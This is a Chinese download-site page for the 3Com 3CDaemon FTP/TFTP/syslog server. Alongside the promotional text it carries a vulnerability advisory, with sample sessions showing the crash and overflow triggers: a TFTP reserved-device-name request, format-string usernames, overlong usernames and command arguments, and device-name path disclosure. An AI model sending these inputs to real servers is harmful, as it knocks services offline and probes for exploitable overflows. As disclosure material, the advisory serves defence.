列表格式显示
热搜词:winrar ftp office photoshop 输入法 ghost win7
广告招商中...... 联系方式!
私信 +好友
1: 3CDaemon /
2: 3CDaemon / 3CDaemon.EXE
3: 3CDaemon / 3CDaemon.ini
4: 3CDaemon / Ftpd.log
5: 3CDaemon / Profiles.ftp
6: 3CDaemon / Tftpd.log
7: 3CDaemon / TFTPHost.ini
3com 3cdaemon 是一款多重服务器功能集成软件,主要作用于服务器中,同时还能够帮助用户改善相关的电脑功能,需要的用户快来绿色资源网下载吧!
3com的这款东西还是很有名很不错滴~~~3cdaemon是一款免费的集成了tftp、ftp和syslog功能的应用程序;作用于ftp,tftp,syslog服务器,tftp客户端,虽然还存在很多的问题,但是使用起来还是不错的!
1、tftp保留设备名拒绝服务攻击
提交类似如下的请求,可导致tftp服务程序挂起:
d:\windows\system32>tftp -i 192.168.0.1 get prn
the 3cdaemon will be crashed with some msgs like
"microsoft visual c++ runtime library"
"runtime error!"
"program : c:\program files\3com\3cdaemon\3cdaemon.exe "
"abnormal program termination".
2、ftp用户名存在格式串问题
提交包含格式串字符作为用户名数据,可导致守护程序崩溃:
h:\>ftp 192.168.0.1
connected to 192.168.0.1.
220 3com 3cdaemon ftp server version 2.0
user (192.168.0.1:(none)): %n
connection closed by remote host.
or:
user (192.168.0.1:(none)): %s
331 user name ok, need password
password:[anythinghere]
530 login access denied
login failed.
ftp>
3、ftp超长用户名缓冲区溢出
由于对用户名缺少正确边界缓冲区检查,提交超长用户名可导致缓冲区溢出:
d:\windows\system32>ftp 192.168.0.1
user (192.168.0.1:(none)):
501 invalid or missing parameters
ftp> user aaa..[about 241 a here]...aaaaa
4、多个ftp命令超长参数缓冲区溢出
cd,send,ls,,put,delete,rename,rmdir,literal,stat,cwd等ftp命令对参数缺少充分边界检查,提交超长字符串作为命令参数可导致缓冲区溢出:
ftp> cd aaa..[about 398 a here]...aaaaa
ftp> ls aaa..[about 247 a here]...aaaaa
200 port command successful.
ftp> put 1.txt aaa..[about 247 a here]...aaaaa
532 need account for storing files
5、多个ftp命令存在格式串问题
提交格式字符串作为参数,可导致程序崩溃。
6、多个ftp命令包设备名信息泄露问题
请求保留设备名可导致返回程序安装路径信息:
ftp> cd aux
550 aux : c:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : c:/3cdaemon/lpt1 is not a directory!
受影响系统:
3com 3cdaemon 2.0 re visio n 10
本页Html网址:/htmlsoft/2652.html
本页aspx网址:/soft.aspx?id=2652&bianhao=20231230_233729_173306&kind1=01网络软件&kind2=FTP工具
上一篇:FlashFXP烈火中文修改版
下一篇:TurboFTP
增加